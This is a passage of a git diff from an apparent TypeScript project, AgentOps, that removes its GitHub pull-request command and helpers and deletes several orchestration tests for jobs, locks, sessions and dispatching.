- - if (!isGhAvailable()) { - console.error( - "GitHub CLI (gh) is not installed. Install it from https://cli.github.com", - ); - process.exit(1); - } - - const run = getRun(db, createRunId(runId)); - if (!run) { - console.error(`Run not found: ${runId}`); - process.exit(1); - } - - const activePolicies = listPolicies(db, { enabled: true }); - const score = computeScore(run, activePolicies); - const body = buildPRBody(run, score); - const title = buildPRTitle(run); - - const pr = createPR(title, body, opts.base); - if (!pr) { - console.error("Failed to create PR. Check that you have commits to push and gh is authenticated."); - process.exit(1); - } - - // Link the PR back to the run - updateRun(db, run.id, { - github: { ...run.github, pr }, - updatedAt: new Date().toISOString(), - } as Partial); - - // If there are policy violations, add a warning comment - const policyChecks = run.evaluations.flatMap((e) => e.policyChecks); - const violations = policyChecks.filter((c) => !c.passed); - if (violations.length > 0) { - const warning = [ - "## Policy Violations", - "", - ...violations.map( - (v) => `- **${v.policyId}**: ${v.message}`, - ), - "", - "Please review these violations before merging.", - ].join("\n"); - addPRComment(pr.number, warning); - } - - if (json) { - console.log(JSON.stringify({ runId, pr, score })); - } else { - console.log(`PR #${pr.number} created: ${pr.url}`); - console.log(` Title: ${pr.title}`); - console.log( - ` Merge recommendation: ${recommendationLabel(score.mergeRecommendation)}`, - ); - if (violations.length > 0) { - console.log( - ` Warning: ${violations.length} policy violation(s) flagged on PR`, - ); - } - } - }); -} - -function buildPRTitle(run: Run): string { - const goal = run.goal.humanReadable; - // Truncate to keep PR title reasonable - if (goal.length <= 70) return goal; - return goal.slice(0, 67) + "..."; -} - -function buildPRBody(run: Run, score: ScoreCard): string { - const lines: string[] = []; - - lines.push(`## Run Summary`); - lines.push(""); - lines.push(`- **Run ID:** \`${run.id}\``); - lines.push(`- **Status:** ${run.status}`); - lines.push(`- **Goal:** ${run.goal.humanReadable}`); - lines.push(""); - - // Metrics - lines.push("## Metrics"); - lines.push(""); - lines.push(`| Metric | Value |`); - lines.push(`|--------|-------|`); - lines.push(`| Tokens | ${run.metrics.tokenUsage.total} |`); - lines.push(`| Cost | $${run.metrics.costUsd.toFixed(2)} |`); - lines.push(`| Duration | ${run.metrics.wallTimeMs}ms |`); - lines.push(""); - - // Test results - const allTests = run.evaluations.flatMap((e) => e.testResults); - if (allTests.length > 0) { - const passed = allTests.filter((t) => t.passed).length; - lines.push("## Test Results"); - lines.push(""); - lines.push(`${passed}/${allTests.length} tests passing`); - lines.push(""); - for (const t of allTests) { - const icon = t.passed ? "+" : "-"; - lines.push(`- [${icon}] ${t.name} (${t.duration}ms)`); - } - lines.push(""); - } - - // Policy results - const allPolicies = run.evaluations.flatMap((e) => e.policyChecks); - if (allPolicies.length > 0) { - const passed = allPolicies.filter((p) => p.passed).length; - lines.push("## Policy Results"); - lines.push(""); - lines.push(`${passed}/${allPolicies.length} policies passing`); - lines.push(""); - for (const p of allPolicies) { - const icon = p.passed ? "+" : "-"; - lines.push(`- [${icon}] ${p.policyId}: ${p.message}`); - } - lines.push(""); - } - - // Score card - lines.push("## Score Card"); - lines.push(""); - lines.push(`| Dimension | Score |`); - lines.push(`|-----------|-------|`); - lines.push(`| Correctness | ${fmtPct(score.correctness.score)} |`); - lines.push(`| Regression Risk | ${fmtPct(score.regressionRisk.score)} |`); - lines.push(`| Scope Risk | ${fmtPct(score.scopeRisk.score)} |`); - lines.push(`| Policy Compliance | ${fmtPct(score.policyCompliance.score)} |`); - lines.push(`| Unknowns | ${fmtPct(score.unknowns.score)} |`); - lines.push(""); - - // Merge recommendation - lines.push("## Merge Recommendation"); - lines.push(""); - lines.push(`**${recommendationLabel(score.mergeRecommendation)}**`); - lines.push(""); - - lines.push("---"); - lines.push("*Generated by AgentOps*"); - - return lines.join("\n"); -} - -function fmtPct(score: number): string { - return `${(score * 100).toFixed(0)}%`; -} - -function recommendationLabel(rec: MergeRecommendation): string { - switch (rec) { - case MergeRecommendation.Merge: - return "MERGE - Safe to merge"; - case MergeRecommendation.Block: - return "BLOCK - Do not merge"; - case MergeRecommendation.Review: - return "REVIEW - Manual review required"; - } -} diff --git a/packages/cli/src/github.ts b/packages/cli/src/github.ts index e910174..8b3c3d4 100644 --- a/packages/cli/src/github.ts +++ b/packages/cli/src/github.ts @@ -118,120 +118,6 @@ export function getIssue(issueNumber: number): GitHubIssue | null { }; } -/** - * Create a pull request. Returns the created PR or null if gh CLI is unavailable. - */ -export function createPR( - title: string, - body: string, - base?: string, -): GitHubPR | null { - if (!ghAvailable()) return null; - - // Title is passed as a single argv element (no shell interpretation); the - // body is piped via stdin with `--body-file -` so it can contain anything. - const args = ["pr", "create", "--title", title, "--body-file", "-"]; - if (base) args.push("--base", base); - args.push( - "--json", - "number,title,url,state,headRefName,baseRefName,additions,deletions,changedFiles", - ); - const raw = gh(args, body); - if (!raw) return null; - - // gh pr create might not return JSON; fall back to fetching the PR - let data: Record; - try { - data = JSON.parse(raw) as Record; - } catch { - // gh pr create outputs the PR URL as plain text on success - // Try to look up the PR we just created - const pr = getLinkedPR(); - return pr; - } - - return { - number: data["number"] as number, - title: data["title"] as string, - url: data["url"] as string, - state: mapPRState((data["state"] as string) ?? "OPEN"), - headBranch: (data["headRefName"] as string) ?? "", - baseBranch: (data["baseRefName"] as string) ?? "", - additions: (data["additions"] as number) ?? 0, - deletions: (data["deletions"] as number) ?? 0, - changedFiles: (data["changedFiles"] as number) ?? 0, - }; -} - -/** - * Add a comment to a pull request. - * Returns true on success, false if gh CLI is unavailable or the command fails. - */ -export function addPRComment(prNumber: number, body: string): boolean { - if (!ghAvailable()) return false; - - // Comment body is piped via stdin (`--body-file -`); it commonly embeds - // agent-recorded data (file paths, command strings, policy messages) that - // must never be evaluated by a shell. - const result = gh( - ["pr", "comment", String(prNumber), "--body-file", "-"], - body, - ); - return result !== ""; -} - -/** - * Create a commit status / check run. - * Returns the check info or null if gh CLI is unavailable. - */ -export function createCheckRun( - name: string, - status: GitHubCheck["status"], - conclusion: GitHubCheck["conclusion"], - detailsUrl?: string, -): GitHubCheck | null { - if (!ghAvailable()) return null; - - // gh doesn't have a direct check-run create, use the API - const headSha = getHeadSha(); - if (!headSha) return null; - - // Build the payload as a real object and serialize with JSON.stringify, then - // pipe it via stdin (`--input -`). No string interpolation, no heredoc, no - // shell — so name/conclusion/detailsUrl can't break out. - const payload: Record = { - name, - head_sha: headSha, - status, - }; - if (conclusion) payload.conclusion = conclusion; - if (detailsUrl) payload.details_url = detailsUrl; - - gh( - ["api", "repos/{owner}/{repo}/check-runs", "--method", "POST", "--input", "-"], - JSON.stringify(payload), - ); - - // Even if the API call fails, return the intended check object - return { - name, - status, - conclusion, - url: detailsUrl ?? "", - }; -} - -function getHeadSha(): string { - try { - return execFileSync("git", ["rev-parse", "HEAD"], { - encoding: "utf-8", - stdio: ["pipe", "pipe", "pipe"], - }).trim(); - } catch { - return ""; - } -} - /** * Check whether the GitHub CLI (gh) is installed and available. */ diff --git a/packages/cli/src/index.ts b/packages/cli/src/index.ts index 49bdc05..46e1a47 100644 --- a/packages/cli/src/index.ts +++ b/packages/cli/src/index.ts @@ -7,13 +7,9 @@ import { registerReportCommand } from "./commands/report.js"; import { registerWrapCommand } from "./commands/wrap.js"; import { registerWatchCommand } from "./commands/watch.js"; import { registerLinkCommands } from "./commands/link.js"; -import { registerPRCommand } from "./commands/pr.js"; // Orchestration commands — uncomment as workstreams land -import { registerJobCommands } from "./commands/job.js"; import { registerSessionCommands } from "./commands/session.js"; import { registerEventsCommands } from "./commands/events.js"; -import { registerLockCommands } from "./commands/lock.js"; -import { registerDispatchCommands } from "./commands/dispatch.js"; import { registerInitCommand } from "./commands/init.js"; import { registerServeCommand } from "./commands/serve.js"; import { registerSetupCommand } from "./commands/setup.js"; @@ -47,12 +43,8 @@ registerReportCommand(program); registerWrapCommand(program); registerWatchCommand(program); registerLinkCommands(program); -registerPRCommand(program); -registerJobCommands(program); registerSessionCommands(program); registerEventsCommands(program); -registerLockCommands(program); -registerDispatchCommands(program); registerInitCommand(program); registerServeCommand(program); registerSetupCommand(program); diff --git a/packages/core/src/__tests__/coordination.test.ts b/packages/core/src/__tests__/coordination.test.ts deleted file mode 100644 index 4faa182..0000000 --- a/packages/core/src/__tests__/coordination.test.ts +++ /dev/null @@ -1,190 +0,0 @@ -import { describe, it, expect } from "vitest"; -import { - createLock, - releaseLock, - isLockExpired, - isLockHeld, - checkConflicts, - generateWorkBranch, - partitionByPath, -} from "../coordination.js"; -import { LockType, createLockId, createJobId } from "../types.js"; -import type { ResourceLock } from "../types.js"; - -function makeLock(overrides: Partial = {}): ResourceLock { - return { - id: createLockId("lock_test"), - lockType: LockType.Repo, - resource: "acme/backend", - holderId: "agent_1", - acquiredAt: new Date().toISOString(), - expiresAt: new Date(Date.now() + 60000).toISOString(), - released: false, - ...overrides, - }; -} - -describe("createLock", () => { - it("produces a valid lock with correct fields", () => { - const lock = createLock(LockType.Repo, "acme/backend", "agent_1", 60000); - - expect(lock.id).toBeTruthy(); - expect(typeof lock.id).toBe("string"); - expect(lock.lockType).toBe(LockType.Repo); - expect(lock.resource).toBe("acme/backend"); - expect(lock.holderId).toBe("agent_1"); - expect(lock.released).toBe(false); - expect(lock.acquiredAt).toBeTruthy(); - expect(lock.expiresAt).toBeTruthy(); - }); - - it("generates unique IDs for different locks", () => { - const lock1 = createLock(LockType.Repo, "acme/backend", "agent_1", 60000); - const lock2 = createLock(LockType.Repo, "acme/backend", "agent_1", 60000); - expect(lock1.id).not.toBe(lock2.id); - }); - - it("sets expiry based on duration", () => { - const before = Date.now(); - const lock = createLock(LockType.Path, "src/index.ts", "agent_1", 30000); - const after = Date.now(); - - const expiresAt = new Date(lock.expiresAt).getTime(); - expect(expiresAt).toBeGreaterThanOrEqual(before + 30000); - expect(expiresAt).toBeLessThanOrEqual(after + 30000); - }); -}); - -describe("releaseLock", () => { - it("sets released to true", () => { - const lock = createLock(LockType.Repo, "acme/backend", "agent_1", 60000); - const released = releaseLock(lock); - - expect(released.released).toBe(true); - expect(released.id).toBe(lock.id); - // Original is unchanged (immutable) - expect(lock.released).toBe(false); - }); -}); - -describe("isLockExpired", () => { - it("returns false for a future expiry", () => { - const lock = makeLock({ expiresAt: new Date(Date.now() + 60000).toISOString() }); - expect(isLockExpired(lock)).toBe(false); - }); - - it("returns true for a past expiry", () => { - const lock = makeLock({ expiresAt: new Date(Date.now() - 1000).toISOString() }); - expect(isLockExpired(lock)).toBe(true); - }); -}); - -describe("isLockHeld", () => { - it("returns true for an active, unreleased lock", () => { - const lock = makeLock(); - expect(isLockHeld(lock)).toBe(true); - }); - - it("returns false for a released lock", () => { - const lock = makeLock({ released: true }); - expect(isLockHeld(lock)).toBe(false); - }); - - it("returns false for an expired lock", () => { - const lock = makeLock({ expiresAt: new Date(Date.now() - 1000).toISOString() }); - expect(isLockHeld(lock)).toBe(false); - }); -}); - -describe("checkConflicts", () => { - it("returns no conflict when no active locks exist", () => { - const result = checkConflicts("acme/backend", LockType.Repo, []); - expect(result.hasConflict).toBe(false); - expect(result.conflictingLocks).toHaveLength(0); - }); - - it("detects repo-level conflict", () => { - const activeLocks = [makeLock({ resource: "acme/backend", lockType: LockType.Repo })]; - const result = checkConflicts("acme/backend", LockType.Repo, activeLocks); - expect(result.hasConflict).toBe(true); - expect(result.conflictingLocks).toHaveLength(1); - }); - - it("detects path conflict with overlapping paths", () => { - const activeLocks = [makeLock({ resource: "src/", lockType: LockType.Path })]; - const result = checkConflicts("src/index.ts", LockType.Path, activeLocks); - expect(result.hasConflict).toBe(true); - }); - - it("detects branch conflict on same branch", () => { - const activeLocks = [makeLock({ resource: "main", lockType: LockType.Branch })]; - const result = checkConflicts("main", LockType.Branch, activeLocks); - expect(result.hasConflict).toBe(true); - }); - - it("ignores released locks", () => { - const activeLocks = [makeLock({ resource: "acme/backend", released: true })]; - const result = checkConflicts("acme/backend", LockType.Repo, activeLocks); - expect(result.hasConflict).toBe(false); - }); - - it("ignores expired locks", () => { - const activeLocks = [ - makeLock({ - resource: "acme/backend", - expiresAt: new Date(Date.now() - 1000).toISOString(), - }), - ]; - const result = checkConflicts("acme/backend", LockType.Repo, activeLocks); - expect(result.hasConflict).toBe(false); - }); - - it("includes holder info in conflict message", () => { - const activeLocks = [makeLock({ resource: "acme/backend", holderId: "agent_42" })]; - const result = checkConflicts("acme/backend", LockType.Repo, activeLocks); - expect(result.message).toContain("agent_42"); - }); -}); - -describe("generateWorkBranch", () => { - it("returns a valid branch strategy", () => { - const jobId = createJobId("job_abc123def456"); - const result = generateWorkBranch(jobId, "main"); - - expect(result.branchName).toBe("agentops/job_abc123de"); - expect(result.baseBranch).toBe("main"); - expect(result.jobId).toBe("job_abc123def456"); - }); -}); - -describe("partitionByPath", () => { - it("distributes paths across jobs", () => { - const paths = ["a.ts", "b.ts", "c.ts", "d.ts"]; - const jobIds = [createJobId("job_1"), createJobId("job_2")]; - - const result = partitionByPath(paths, jobIds); - - expect(result.partitions).toHaveLength(2); - expect(result.partitions[0]!.paths).toEqual(["a.ts", "c.ts"]); - expect(result.partitions[1]!.paths).toEqual(["b.ts", "d.ts"]); - expect(result.unassigned).toEqual([]); - }); - - it("returns all paths as unassigned when no jobs", () => { - const paths = ["a.ts", "b.ts"]; - const result = partitionByPath(paths, []); - - expect(result.partitions).toHaveLength(0); - expect(result.unassigned).toEqual(["a.ts", "b.ts"]); - }); - - it("handles single job", () => { - const paths = ["a.ts", "b.ts", "c.ts"]; - const jobIds = [createJobId("job_1")]; - - const result = partitionByPath(paths, jobIds); - - expect(result.partitions).toHaveLength(1); - expect(result.partitions[0]!.paths).toEqual(["a.ts", "b.ts", "c.ts"]); - }); -}); diff --git a/packages/core/src/__tests__/dispatcher.test.ts b/packages/core/src/__tests__/dispatcher.test.ts deleted file mode 100644 index 6ae405d..0000000 --- a/packages/core/src/__tests__/dispatcher.test.ts +++ /dev/null @@ -1,169 +0,0 @@ -import { describe, it, expect } from "vitest"; -import { evaluateDispatch, selectNextJob, matchSession } from "../dispatcher.js"; -import { - JobStatus, - JobPriority, - SessionStatus, - createJobId, - createSessionId, - createAgentId, - createRunId, -} from "../types.js"; -import type { Job, Session, ConcurrencyLimits } from "../types.js"; - -const defaultLimits: ConcurrencyLimits = { - perRepo: 5, - perOrg: 10, - global: 50, -}; - -function makeJob(overrides: Partial = {}): Job { - return { - id: createJobId("job_1"), - status: JobStatus.Queued, - priority: JobPriority.Normal, - goal: { - humanReadable: "Test", - structured: { type: "task", description: "Test", parameters: {} }, - }, - environment: { - repo: "test/repo", - branch: "main", - permissions: [], - sandbox: { enabled: false, isolationLevel: "none" }, - }, - retryPolicy: { maxRetries: 3, backoffMs: 1000, backoffMultiplier: 2 }, - concurrencyLimits: defaultLimits, - runIds: [], - sessionId: null, - attempt: 0, - maxAttempts: 3, - queuedAt: "2025-01-01T00:00:00.000Z", - dispatchedAt: null, - completedAt: null, - createdAt: "2025-01-01T00:00:00.000Z", - updatedAt: "2025-01-01T00:00:00.000Z", - ...overrides, - }; -} - -function makeSession(overrides: Partial = {}): Session { - return { - id: createSessionId("session_1"), - status: SessionStatus.Active, - agentId: createAgentId("agent_1"), - currentRunId: null, - completedRunIds: [], - resourceUsage: { - memoryMb: 256, - cpuPercent: 10, - tokensBudgetRemaining: 100000, - costBudgetRemaining: 50, - }, - metadata: {}, - startedAt: "2025-01-01T00:00:00.000Z", - lastHeartbeatAt: "2025-01-01T00:00:00.000Z", - terminatedAt: null, - createdAt: "2025-01-01T00:00:00.000Z", - updatedAt: "2025-01-01T00:00:00.000Z", - ...overrides, - }; -} - -describe("evaluateDispatch", () => { - it("allows dispatch when under limits", () => { - const job = makeJob(); - const result = evaluateDispatch(job, [], 2, 10, { concurrencyLimits: defaultLimits }); - - expect(result.canDispatch).toBe(true); - expect(result.reason).toBe("OK"); - }); - - it("blocks when global limit reached", () => { - const job = makeJob(); - const result = evaluateDispatch(job, [], 2, 50, { concurrencyLimits: defaultLimits }); - - expect(result.canDispatch).toBe(false); - expect(result.reason).toContain("Global"); - }); - - it("blocks when per-repo limit reached", () => { - const job = makeJob(); - const result = evaluateDispatch(job, [], 5, 10, { concurrencyLimits: defaultLimits }); - - expect(result.canDispatch).toBe(false); - expect(result.reason).toContain("repo"); - }); -}); - -describe("selectNextJob", () => { - it("returns null for empty queue", () => { - expect(selectNextJob([])).toBeNull(); - }); - - it("selects highest priority job first", () => { - const low = makeJob({ id: createJobId("job_low"), priority: JobPriority.Low }); - const critical = makeJob({ id: createJobId("job_critical"), priority: JobPriority.Critical }); - const normal = makeJob({ id: createJobId("job_normal"), priority: JobPriority.Normal }); - - const selected = selectNextJob([low, critical, normal]); - expect(selected!.id).toBe("job_critical"); - }); - - it("uses queuedAt as tiebreaker for same priority", () => { - const earlier = makeJob({ - id: createJobId("job_early"), - priority: JobPriority.Normal, - queuedAt: "2025-01-01T00:00:00.000Z", - }); - const later = makeJob({ - id: createJobId("job_late"), - priority: JobPriority.Normal, - queuedAt: "2025-01-02T00:00:00.000Z", - }); - - const selected = selectNextJob([later, earlier]); - expect(selected!.id).toBe("job_early"); - }); -}); - -describe("matchSession", () => { - it("returns null when no active sessions", () => { - const job = makeJob(); - expect(matchSession(job, [])).toBeNull(); - }); - - it("returns an active session with no current run", () => { - const job = makeJob(); - const session = makeSession({ id: createSessionId("session_1"), currentRunId: null }); - const result = matchSession(job, [session]); - - expect(result).not.toBeNull(); - expect(result!.id).toBe("session_1"); - }); - - it("skips sessions that already have a current run", () => { - const job = makeJob(); - const busy = makeSession({ - id: createSessionId("session_busy"), - currentRunId: createRunId("run_1"), - }); - const free = makeSession({ - id: createSessionId("session_free"), - currentRunId: null, - }); - - const result = matchSession(job, [busy, free]); - expect(result!.id).toBe("session_free"); - }); - - it("skips non-active sessions", () => { - const job = makeJob(); - const provisioning = makeSession({ - id: createSessionId("session_provisioning"), - status: SessionStatus.Provisioning, - }); - - expect(matchSession(job, [provisioning])).toBeNull(); - }); -}); diff --git a/packages/core/src/__tests__/events.test.ts b/packages/core/src/__tests__/events.test.ts index 4a0f3b5..8c7aba2 100644 --- a/packages/core/src/__tests__/events.test.ts +++ b/packages/core/src/__tests__/events.test.ts @@ -4,13 +4,6 @@ import { EventCategory } from "../types.js"; import type { AgentEvent } from "../types.js"; describe("EVENT_TYPES", () => { - it("has all expected job event types", () => { - expect(EVENT_TYPES["job.queued"]).toBe("job.queued"); - expect(EVENT_TYPES["job.dispatched"]).toBe("job.dispatched"); - expect(EVENT_TYPES["job.completed"]).toBe("job.completed"); - expect(EVENT_TYPES["job.failed"]).toBe("job.failed"); - }); - it("has all expected run event types", () => { expect(EVENT_TYPES["run.started"]).toBe("run.started"); expect(EVENT_TYPES["run.completed"]).toBe("run.completed"); @@ -35,16 +28,16 @@ describe("EVENT_TYPES", () => { describe("createEvent", () => { it("creates an event with all required fields", () => { const event = createEvent( - EventCategory.Job, - EVENT_TYPES["job.queued"], - "job_123", + EventCategory.Run, + EVENT_TYPES["run.started"], + "run_123", { priority: "high" }, ); expect(event.id).toContain("evt_"); - expect(event.category).toBe(EventCategory.Job); - expect(event.type).toBe("job.queued"); - expect(event.sourceId).toBe("job_123"); + expect(event.category).toBe(EventCategory.Run); + expect(event.type).toBe("run.started"); + expect(event.sourceId).toBe("run_123"); expect(event.payload).toEqual({ priority: "high" }); expect(event.timestamp).toBeTruthy(); }); diff --git a/packages/core/src/__tests__/job.test.ts b/packages/core/src/__tests__/job.test.ts deleted file mode 100644 index aecc755..0000000 --- a/packages/core/src/__tests__/job.test.ts +++ /dev/null @@ -1,143 +0,0 @@ -import { describe, it, expect } from "vitest"; -import { - createJob, - dispatchJob, - startJobRun, - completeJob, - failJob, - cancelJob, - retryJob, -} from "../job.js"; -import { - JobStatus, - JobPriority, - createSessionId, - createRunId, -} from "../types.js"; -import type { Job } from "../types.js"; - -const testGoal: Job["goal"] = { - humanReadable: "Fix bug in auth module", - structured: { type: "bugfix", description: "Fix bug in auth module", parameters: {} }, -}; - -const testEnv: Job["environment"] = { - repo: "acme/backend", - branch: "fix/auth-bug", - permissions: ["read", "write"], - sandbox: { enabled: true, isolationLevel: "container" }, -}; - -describe("createJob", () => { - it("produces a valid initial Job with Queued status", () => { - const job = createJob(testGoal, testEnv); - - expect(job.id).toBeTruthy(); - expect(typeof job.id).toBe("string"); - expect(job.status).toBe(JobStatus.Queued); - expect(job.priority).toBe(JobPriority.Normal); - expect(job.goal).toEqual(testGoal); - expect(job.environment).toEqual(testEnv); - expect(job.runIds).toEqual([]); - expect(job.sessionId).toBeNull(); - expect(job.attempt).toBe(0); - expect(job.maxAttempts).toBe(3); - expect(job.queuedAt).toBeTruthy(); - expect(job.dispatchedAt).toBeNull(); - expect(job.completedAt).toBeNull(); - expect(job.createdAt).toBeTruthy(); - expect(job.updatedAt).toBeTruthy(); - }); - - it("accepts custom priority and options", () => { - const job = createJob(testGoal, testEnv, { - priority: JobPriority.Critical, - maxAttempts: 5, - }); - - expect(job.priority).toBe(JobPriority.Critical); - expect(job.maxAttempts).toBe(5); - }); - - it("generates unique IDs for different jobs", () => { - const job1 = createJob(testGoal, testEnv); - const job2 = createJob(testGoal, testEnv); - expect(job1.id).not.toBe(job2.id); - }); -}); - -describe("dispatchJob", () => { - it("sets status to Dispatched with sessionId", () => { - const job = createJob(testGoal, testEnv); - const sessionId = createSessionId("session_1"); - const dispatched = dispatchJob(job, sessionId); - - expect(dispatched.status).toBe(JobStatus.Dispatched); - expect(dispatched.sessionId).toBe(sessionId); - expect(dispatched.dispatchedAt).toBeTruthy(); - expect(dispatched.id).toBe(job.id); - }); -}); - -describe("startJobRun", () => { - it("sets status to Running and appends runId", () => { - const job = createJob(testGoal, testEnv); - const runId = createRunId("run_1"); - const running = startJobRun(job, runId); - - expect(running.status).toBe(JobStatus.Running); - expect(running.runIds).toHaveLength(1); - expect(running.runIds[0]).toBe(runId); - // Original is unchanged (immutable) - expect(job.runIds).toHaveLength(0); - }); -}); - -describe("completeJob", () => { - it("sets status to Completed with completedAt", () => { - const job = createJob(testGoal, testEnv); - const completed = completeJob(job); - - expect(completed.status).toBe(JobStatus.Completed); - expect(completed.completedAt).toBeTruthy(); - }); -}); - -describe("failJob", () => { - it("sets status to Failed", () => { - const job = createJob(testGoal, testEnv); - const failed = failJob(job, "Build failed"); - - expect(failed.status).toBe(JobStatus.Failed); - }); -}); - -describe("cancelJob", () => { - it("sets status to Cancelled", () => { - const job = createJob(testGoal, testEnv); - const cancelled = cancelJob(job); - - expect(cancelled.status).toBe(JobStatus.Cancelled); - }); -}); - -describe("retryJob", () => { - it("increments attempt and resets to Queued when under maxAttempts", () => { - const job = createJob(testGoal, testEnv, { maxAttempts: 3 }); - const retried = retryJob(job); - - expect(retried.status).toBe(JobStatus.Queued); - expect(retried.attempt).toBe(1); - expect(retried.sessionId).toBeNull(); - expect(retried.dispatchedAt).toBeNull(); - }); - - it("sets status to Failed when maxAttempts reached", () => { - let job = createJob(testGoal, testEnv, { maxAttempts: 2 }); - job = { ...job, attempt: 2 }; - const retried = retryJob(job); - - expect(retried.status).toBe(JobStatus.Failed); - expect(retried.attempt).toBe(2); - }); -}); diff --git a/packages/core/src/__tests__/orchestration-types.test.ts b/packages/core/src/__tests__/orchestration-types.test.ts deleted file mode 100644 index 956c3e4..0000000 --- a/packages/core/src/__tests__/orchestration-types.test.ts +++ /dev/null @@ -1,191 +0,0 @@ -import { describe, it, expect } from "vitest"; -import { - createJobId, - createSessionId, - createEventId, - createLockId, - createAgentId, - createRunId, - JobStatus, - JobPriority, - SessionStatus, - EventCategory, - LockType, -} from "../types.js"; -import type { Job, Session, AgentEvent, ResourceLock } from "../types.js"; - -describe("Orchestration branded ID helpers", () => { - it("createJobId returns a branded string", () => { - const id = createJobId("job_123"); - expect(id).toBe("job_123"); - expect(typeof id).toBe("string"); - }); - - it("createSessionId returns a branded string", () => { - const id = createSessionId("session_abc"); - expect(id).toBe("session_abc"); - expect(typeof id).toBe("string"); - }); - - it("createEventId returns a branded string", () => { - const id = createEventId("evt_456"); - expect(id).toBe("evt_456"); - expect(typeof id).toBe("string"); - }); - - it("createLockId returns a branded string", () => { - const id = createLockId("lock_789"); - expect(id).toBe("lock_789"); - expect(typeof id).toBe("string"); - }); -}); - -describe("JobStatus enum", () => { - it("has expected values", () => { - expect(JobStatus.Queued).toBe("queued"); - expect(JobStatus.Dispatched).toBe("dispatched"); - expect(JobStatus.Running).toBe("running"); - expect(JobStatus.Completed).toBe("completed"); - expect(JobStatus.Failed).toBe("failed"); - expect(JobStatus.Cancelled).toBe("cancelled"); - }); -}); - -describe("JobPriority enum", () => { - it("has expected values", () => { - expect(JobPriority.Critical).toBe("critical"); - expect(JobPriority.High).toBe("high"); - expect(JobPriority.Normal).toBe("normal"); - expect(JobPriority.Low).toBe("low"); - }); -}); - -describe("SessionStatus enum", () => { - it("has expected values", () => { - expect(SessionStatus.Provisioning).toBe("provisioning"); - expect(SessionStatus.Active).toBe("active"); - expect(SessionStatus.Terminated).toBe("terminated"); - }); -}); - -describe("EventCategory enum", () => { - it("has expected values", () => { - expect(EventCategory.Job).toBe("job"); - expect(EventCategory.Run).toBe("run"); - expect(EventCategory.Session).toBe("session"); - expect(EventCategory.Policy).toBe("policy"); - expect(EventCategory.Cost).toBe("cost"); - expect(EventCategory.Action).toBe("action"); - }); -}); - -describe("LockType enum", () => { - it("has expected values", () => { - expect(LockType.Repo).toBe("repo"); - expect(LockType.Path).toBe("path"); - expect(LockType.Branch).toBe("branch"); - }); -}); - -describe("Job interface (structural)", () => { - it("can be constructed with all required fields", () => { - const job: Job = { - id: createJobId("job_1"), - status: JobStatus.Queued, - priority: JobPriority.Normal, - goal: { - humanReadable: "Fix the bug", - structured: { type: "task", description: "Fix the bug", parameters: {} }, - }, - environment: { - repo: "test/repo", - branch: "main", - permissions: ["read", "write"], - sandbox: { enabled: true, isolationLevel: "container" }, - }, - retryPolicy: { maxRetries: 3, backoffMs: 1000, backoffMultiplier: 2 }, - concurrencyLimits: { perRepo: 5, perOrg: 20, global: 50 }, - runIds: [], - sessionId: null, - attempt: 0, - maxAttempts: 3, - queuedAt: "2025-01-01T00:00:00.000Z", - dispatchedAt: null, - completedAt: null, - createdAt: "2025-01-01T00:00:00.000Z", - updatedAt: "2025-01-01T00:00:00.000Z", - }; - - expect(job.id).toBe("job_1"); - expect(job.status).toBe(JobStatus.Queued); - expect(job.priority).toBe(JobPriority.Normal); - expect(job.runIds).toHaveLength(0); - expect(job.sessionId).toBeNull(); - }); -}); - -describe("Session interface (structural)", () => { - it("can be constructed with all required fields", () => { - const session: Session = { - id: createSessionId("session_1"), - status: SessionStatus.Active, - agentId: createAgentId("agent_1"), - currentRunId: createRunId("run_1"), - completedRunIds: [], - resourceUsage: { - memoryMb: 256, - cpuPercent: 15, - tokensBudgetRemaining: 100000, - costBudgetRemaining: 5.0, - }, - metadata: { runtime: "claude-code" }, - startedAt: "2025-01-01T00:00:00.000Z", - lastHeartbeatAt: "2025-01-01T00:05:00.000Z", - terminatedAt: null, - createdAt: "2025-01-01T00:00:00.000Z", - updatedAt: "2025-01-01T00:05:00.000Z", - }; - - expect(session.id).toBe("session_1"); - expect(session.status).toBe(SessionStatus.Active); - expect(session.currentRunId).toBe("run_1"); - expect(session.resourceUsage.memoryMb).toBe(256); - }); -}); - -describe("AgentEvent interface (structural)", () => { - it("can be constructed with all required fields", () => { - const event: AgentEvent = { - id: createEventId("evt_1"), - category: EventCategory.Job, - type: "job.queued", - payload: { jobId: "job_1", priority: "normal" }, - sourceId: "job_1", - timestamp: "2025-01-01T00:00:00.000Z", - }; - - expect(event.id).toBe("evt_1"); - expect(event.category).toBe(EventCategory.Job); - expect(event.type).toBe("job.queued"); - expect(event.payload).toHaveProperty("jobId"); - }); -}); - -describe("ResourceLock interface (structural)", () => { - it("can be constructed with all required fields", () => { - const lock: ResourceLock = { - id: createLockId("lock_1"), - lockType: LockType.Repo, - resource: "acme/backend", - holderId: "job_1", - acquiredAt: "2025-01-01T00:00:00.000Z", - expiresAt: "2025-01-01T01:00:00.000Z", - released: false, - }; - - expect(lock.id).toBe("lock_1"); - expect(lock.lockType).toBe(LockType.Repo); - expect(lock.resource).toBe("acme/backend"); - expect(lock.released).toBe(false); - }); -}); diff --git a/packages/core/src/__tests__/orchestrator.test.ts b/packages/core/src/__tests__/orchestrator.test.ts deleted file mode 100644 index 251c10d..0000000 --- a/packages/core/src/__tests__/orchestrator.test.ts +++ /dev/null @@ -1,419 +0,0 @@ -import { describe, it, expect, beforeEach } from "vitest"; -import type { Job, Session, AgentEvent, ResourceLock, JobId, RunId, SessionId } from "../types.js"; -import { - JobStatus, - SessionStatus, - createJobId, - createRunId, - createSessionId, - createAgentId, - createLockId, - LockType, -} from "../types.js"; -import { EventBus } from "../events.js"; -import { createSession, activateSession } from "../session.js"; -import type { OrchestratorDb } from "../orchestrator.js"; -import { - submitAndQueueJob, - dispatchNextJob, - startJobExecution, - completeJobExecution, - failJobExecution, - terminateSessionGracefully, - cleanupStaleSessions, - cleanupExpiredLocks, -} from "../orchestrator.js"; - -// ─── In-memory mock DB ────────────────────────────────────────────────────── - -function createMockDb(): OrchestratorDb { - const jobStore = new Map(); - const sessionStore = new Map(); - const eventStore: AgentEvent[] = []; - const lockStore = new Map(); - - return { - insertJob(job: Job) { - jobStore.set(job.id as string, job); - }, - getJob(id: JobId) { - return jobStore.get(id as string) ?? null; - }, - updateJob(id: JobId, updates: Partial) { - const existing = jobStore.get(id as string); - if (existing) { - jobStore.set(id as string, { ...existing, ...updates } as Job); - } - }, - getQueuedJobs(_limit?: number) { - return Array.from(jobStore.values()).filter((j) => j.status === JobStatus.Queued); - }, - countJobsByRepo(repo: string, statuses: string[]) { - return 